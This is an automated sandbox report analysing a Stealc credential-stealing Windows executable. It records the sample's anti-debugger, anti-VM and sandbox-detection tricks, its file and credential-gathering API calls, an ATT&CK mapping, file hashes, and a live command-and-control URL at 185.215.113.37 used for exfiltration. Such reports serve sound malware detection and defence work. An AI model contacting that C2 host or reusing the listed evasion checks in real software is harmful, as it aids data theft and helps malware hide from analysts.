                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C813 second address: E2C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F0D34B708F8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000004h 0x00000023 or dword ptr [ebp+122D1C98h], edx 0x00000029 call 00007F0D34B708F9h 0x0000002e jmp 00007F0D34B708FCh 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C85C second address: E2C860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C860 second address: E2C881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F0D34B708FAh 0x00000014 popad 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C881 second address: E2C887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CB07 second address: E2CBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70904h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0D34B708F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push ebx 0x00000028 add dl, 00000034h 0x0000002b pop edx 0x0000002c sub dh, FFFFFF93h 0x0000002f push dword ptr [ebp+122D1A03h] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F0D34B708F8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov edx, dword ptr [ebp+122D1C8Fh] 0x00000055 call 00007F0D34B708F9h 0x0000005a ja 00007F0D34B70902h 0x00000060 push eax 0x00000061 push edi 0x00000062 pushad 0x00000063 jg 00007F0D34B708F6h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CBA0 second address: E2CBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F0D344F4AB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CBB3 second address: E2CBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CBB7 second address: E2CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CBC5 second address: E2CBD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2CBD3 second address: E2CBEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E219 second address: E2E21F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E21F second address: E2E24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F0D344F4AC2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E24E second address: E2E268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0D34B70905h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703ED second address: 54703F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703F2 second address: 5470432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e jmp 00007F0D34B70901h 0x00000013 push esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0D34B708FAh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470432 second address: 5470436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470436 second address: 547043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547043A second address: 5470440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BA1A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCCABE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00954910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0094DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0094E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0094ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00954570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094F68A FindFirstFileA,0_2_0094F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0094F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00953EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0094DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0094BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00941160 GetSystemInfo,ExitProcess,0_2_00941160
                Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2090680717.0000000001645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13406
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13395
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13392
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13446
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13414
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009445C0 VirtualProtect ?,00000004,00000100,000000000_2_009445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00959860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959750 mov eax, dword ptr fs:[00000030h]0_2_00959750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009578E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00959600
                Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00957B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00957980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00957980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00957850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00957850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00957A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00957A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/nfile.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37/I~file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php2file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpdfile.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpo?file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.37/e2b1563c6670f193.phpWfile.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.37
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1520474
                                  Start date and time:2024-09-27 11:25:14 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 6s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 81%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 88
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.378y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNL8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                  • 185.215.113.103
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.950254409898125
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'828'864 bytes
                                  MD5:219066ac9697d1cdeb536bc4ea74c123
                                  SHA1:a8f5b34c40766dbf7ae0140c581dc23c5d75918f
                                  SHA256:ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
                                  SHA512:0bfc7e3adcf4712c8f2d21810e0649edaaeff972cb3bd8a31f420200188eb2221593d9966bf8ff91e68162de9bd4f90a3676beb8bea90faa32272882ae9f81f4
                                  SSDEEP:49152:s+tFXr7DkxHdvqpZ+w2wg8I2wBnU7S0sOUP:5FXYGZh2wNwG7Shz
                                  TLSH:6585332915FE6567E8D4B6FB4C96E55173304188B3EADB588D2E081CC8532EBEB274F0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xa94000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0D347D556Ah
                                  shufps xmm3, dqword ptr [ebx], 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F0D347D7565h
                                  add byte ptr [eax], al
                                  add al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  or ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add eax, 0300000Ah
                                  or al, byte ptr [eax]
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
